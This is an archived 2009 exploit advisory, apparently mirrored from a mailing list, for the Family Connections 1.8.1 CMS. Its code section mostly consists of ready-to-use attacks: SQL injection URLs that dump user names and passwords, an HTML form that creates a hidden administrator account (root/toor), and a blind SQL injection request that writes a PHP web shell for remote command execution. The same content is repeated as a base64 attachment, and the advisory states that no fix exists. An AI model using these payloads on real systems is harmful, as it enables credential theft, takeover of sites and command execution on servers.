AOH :: HP Unsorted F :: VA3008.HTM

Family Connections 1.8.1 Multiple Remote Vulnerabilities



Family Connections 1.8.1 Multiple Remote Vulnerabilities
Family Connections 1.8.1 Multiple Remote Vulnerabilities



--001636c598645273b9046659a77e
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit

*******   Salvatore "drosophila" Fresta   *******

[+] Application: Family Connection
[+] Version: 1.8.1
[+] Website: http://www.familycms.com 

[+] Bugs: [A] Multiple SQL Injection
          [B] Create Admin User
          [C] Blind SQL Injection	

[+] Exploitation: Remote
[+] Date: 25 Mar 2009

[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@gmail.com 


*************************************************

[+] Menu

1) Bugs
2) Code
3) Fix


*************************************************

[+] Bugs


- [A] Multiple SQL Injection

[-] Requisites: magic_quotes_gpc = on/off

These bugs allows a registered user to view
username and password of all registered users.


- [B] Create Admin User

[-] Requisites: magic_quotes_gpc = off
[-] File affected: register.php, activate.php

This bug allow a guest to create an account with
administrator privileges.


- [C] Blind SQL Injection

[-] Requisites: magic_quotes_gpc = off
[-] File affected: lostpw.php


*************************************************

[+] Code


- [A] Multiple SQL Injection

http://www.site.com/path/addressbook.php?letter=-1%25' UNION ALL 
SELECT 1,2,NULL,username,5,password,email FROM fcms_users%23

http://www.site.com/path/recipes.php?category=1&id=1 UNION SELECT 
1,2,username,password,5,6 FROM fcms_users

http://www.site.com/path/home.php?poll_id=-1 UNION ALL SELECT 
1,NULL,3,CONCAT(username, 0x3a, password) FROM fcms_users%23


- [B] Create Admin User


  
    Family Connection 1.8.1 Create Admin User Exploit
  
  
    

This exploit creates an user with administrator privileges using follows information:
Username: root
Password: toor

action="http://localhost/fcms/register.php" method="POST"> value="blabla@blabla.blabla"> 'root@owned.com', '00-00-00', 'root', '7b24afc8bc80e548d66c4e7ff72171c5')#'">
To activate accounts: http://www.site.com/path/activate.php?uid=1 or 1=1&code [C] Blind SQL Injection POST /path/lostpw.php HTTP/1.1\r\n" Host: www.site.com\r\n" Content-Type: application/x-www-form-urlencoded\r\n" Content-Length: 193\r\n\r\n" email=-1' UNION ALL SELECT '"; system($_GET[cmd]); echo "


";?>',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 INTO OUTFILE '/var/www/htdocs/path/rce.php'# To execute commands: http://www.site.com/path/rce.php?cmd=ls ************************************************* [+] Fix No fix. ************************************************* -- Salvatore "drosophila" Fresta CWNP444351 --001636c598645273b9046659a77e Content-Type: text/plain; charset=US-ASCII; name="Family Connections 1.8.1 Multiple Remote Vulnerabilities-25032009.txt" Content-Disposition: attachment; filename="Family Connections 1.8.1 Multiple Remote Vulnerabilities-25032009.txt" Content-Transfer-Encoding: base64 X-Attachment-Id: f_fsxgawzd0 KioqKioqKiAgIFNhbHZhdG9yZSAiZHJvc29waGlsYSIgRnJlc3RhICAgKioqKioqKgoKWytdIEFw cGxpY2F0aW9uOiBGYW1pbHkgQ29ubmVjdGlvbgpbK10gVmVyc2lvbjogMS44LjEKWytdIFdlYnNp dGU6IGh0dHA6Ly93d3cuZmFtaWx5Y21zLmNvbQoKWytdIEJ1Z3M6IFtBXSBNdWx0aXBsZSBTUUwg SW5qZWN0aW9uCiAgICAgICAgICBbQl0gQ3JlYXRlIEFkbWluIFVzZXIKICAgICAgICAgIFtDXSBC bGluZCBTUUwgSW5qZWN0aW9uCQoKWytdIEV4cGxvaXRhdGlvbjogUmVtb3RlClsrXSBEYXRlOiAy NSBNYXIgMjAwOQoKWytdIERpc2NvdmVyZWQgYnk6IFNhbHZhdG9yZSAiZHJvc29waGlsYSIgRnJl c3RhClsrXSBBdXRob3I6IFNhbHZhdG9yZSAiZHJvc29waGlsYSIgRnJlc3RhClsrXSBDb250YWN0 OiBlLW1haWw6IGRyb3NvcGhpbGF4eHhAZ21haWwuY29tCgoKKioqKioqKioqKioqKioqKioqKioq KioqKioqKioqKioqKioqKioqKioqKioqKioqKgoKWytdIE1lbnUKCjEpIEJ1Z3MKMikgQ29kZQoz KSBGaXgKCgoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq CgpbK10gQnVncwoKCi0gW0FdIE11bHRpcGxlIFNRTCBJbmplY3Rpb24KClstXSBSZXF1aXNpdGVz OiBtYWdpY19xdW90ZXNfZ3BjID0gb24vb2ZmCgpUaGVzZSBidWdzIGFsbG93cyBhIHJlZ2lzdGVy ZWQgdXNlciB0byB2aWV3CnVzZXJuYW1lIGFuZCBwYXNzd29yZCBvZiBhbGwgcmVnaXN0ZXJlZCB1 c2Vycy4KCgotIFtCXSBDcmVhdGUgQWRtaW4gVXNlcgoKWy1dIFJlcXVpc2l0ZXM6IG1hZ2ljX3F1 b3Rlc19ncGMgPSBvZmYKWy1dIEZpbGUgYWZmZWN0ZWQ6IHJlZ2lzdGVyLnBocCwgYWN0aXZhdGUu cGhwCgpUaGlzIGJ1ZyBhbGxvdyBhIGd1ZXN0IHRvIGNyZWF0ZSBhbiBhY2NvdW50IHdpdGgKYWRt aW5pc3RyYXRvciBwcml2aWxlZ2VzLgoKCi0gW0NdIEJsaW5kIFNRTCBJbmplY3Rpb24KClstXSBS ZXF1aXNpdGVzOiBtYWdpY19xdW90ZXNfZ3BjID0gb2ZmClstXSBGaWxlIGFmZmVjdGVkOiBsb3N0 cHcucGhwCgoKKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq KgoKWytdIENvZGUKCgotIFtBXSBNdWx0aXBsZSBTUUwgSW5qZWN0aW9uCgpodHRwOi8vd3d3LnNp dGUuY29tL3BhdGgvYWRkcmVzc2Jvb2sucGhwP2xldHRlcj0tMSUyNScgVU5JT04gQUxMIFNFTEVD VCAxLDIsTlVMTCx1c2VybmFtZSw1LHBhc3N3b3JkLGVtYWlsIEZST00gZmNtc191c2VycyUyMwoK aHR0cDovL3d3dy5zaXRlLmNvbS9wYXRoL3JlY2lwZXMucGhwP2NhdGVnb3J5PTEmaWQ9MSBVTklP TiBTRUxFQ1QgMSwyLHVzZXJuYW1lLHBhc3N3b3JkLDUsNiBGUk9NIGZjbXNfdXNlcnMKCmh0dHA6 Ly93d3cuc2l0ZS5jb20vcGF0aC9ob21lLnBocD9wb2xsX2lkPS0xIFVOSU9OIEFMTCBTRUxFQ1Qg MSxOVUxMLDMsQ09OQ0FUKHVzZXJuYW1lLCAweDNhLCBwYXNzd29yZCkgRlJPTSBmY21zX3VzZXJz JTIzCgoKLSBbQl0gQ3JlYXRlIEFkbWluIFVzZXIKCjxodG1sPgogIDxoZWFkPgogICAgPHRpdGxl PkZhbWlseSBDb25uZWN0aW9uIDEuOC4xIENyZWF0ZSBBZG1pbiBVc2VyIEV4cGxvaXQ8L3RpdGxl PgogIDwvaGVhZD4KICA8Ym9keT4KICAgIDxwPlRoaXMgZXhwbG9pdCBjcmVhdGVzIGFuIHVzZXIg d2l0aCBhZG1pbmlzdHJhdG9yIHByaXZpbGVnZXMgdXNpbmcgZm9sbG93cyBpbmZvcm1hdGlvbjo8 YnI+CiAgICAgICBVc2VybmFtZTogcm9vdDxicj4KICAgICAgIFBhc3N3b3JkOiB0b29yPGJyPgog ICAgPGZvcm0gYWN0aW9uPSJodHRwOi8vbG9jYWxob3N0L2ZjbXMvcmVnaXN0ZXIucGhwIiBtZXRo b2Q9IlBPU1QiPgogICAgICA8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJ1c2VybmFtZSIgdmFs dWU9ImJsYWJsYSI+CiAgICAgIDxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9InBhc3N3b3JkIiB2 YWx1ZT0iYmxhYmxhIj4KICAgICAgPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iZW1haWwiIHZh bHVlPSJibGFibGFAYmxhYmxhLmJsYWJsYSI+CiAgICAgIDxpbnB1dCB0eXBlPSJoaWRkZW4iIG5h bWU9ImZuYW1lIiB2YWx1ZT0iYmxhYmxhIj4KICAgICAgPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFt ZT0ibG5hbWUiIHZhbHVlPSJibGFibGEiPgogICAgICA8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1l PSJ5ZWFyIiB2YWx1ZT0iMDAtMDAtMDAwJywnZmFrZXVzZXInLCdmYWtlcGFzc3dvcmQnKSwgKDEs IE5PVygpLCAncm9vdCcsICdyb290JywgJ3Jvb3RAb3duZWQuY29tJywgJzAwLTAwLTAwJywgJ3Jv b3QnLCAnN2IyNGFmYzhiYzgwZTU0OGQ2NmM0ZTdmZjcyMTcxYzUnKSMnIj4KICAgICAgPGlucHV0 IHR5cGU9InN1Ym1pdCIgbmFtZT0ic3VibWl0IiB2YWx1ZT0iRXhwbG9pdCI+CiAgICA8L2Zvcm0+ CiAgPC9ib2R5Pgo8L2h0bWw+CgpUbyBhY3RpdmF0ZSBhY2NvdW50czoKCmh0dHA6Ly93d3cuc2l0 ZS5jb20vcGF0aC9hY3RpdmF0ZS5waHA/dWlkPTEgb3IgMT0xJmNvZGU9CgoKW0NdIEJsaW5kIFNR TCBJbmplY3Rpb24KClBPU1QgL3BhdGgvbG9zdHB3LnBocCBIVFRQLzEuMVxyXG4iCkhvc3Q6IHd3 dy5zaXRlLmNvbVxyXG4iCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxl bmNvZGVkXHJcbiIKQ29udGVudC1MZW5ndGg6IDE5M1xyXG5cclxuIgplbWFpbD0tMScgVU5JT04g QUxMIFNFTEVDVCAnPD9waHAgZWNobyAiPHByZT4iOyBzeXN0ZW0oJF9HRVRbY21kXSk7IGVjaG8g IjwvcHJlPjxicj48YnI+Ijs/PicsMCwwLDAsMCwwLDAsMCwwLDAsMCwwLDAsMCwwLDAsMCwwLDAs MCwwLDAgSU5UTyBPVVRGSUxFICcvdmFyL3d3dy9odGRvY3MvcGF0aC9yY2UucGhwJyMKClRvIGV4 ZWN1dGUgY29tbWFuZHM6CgpodHRwOi8vd3d3LnNpdGUuY29tL3BhdGgvcmNlLnBocD9jbWQ9bHMK CgoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqCgpbK10g Rml4CgpObyBmaXguCgoKKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq KioqKioqKg=--001636c598645273b9046659a77e--

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.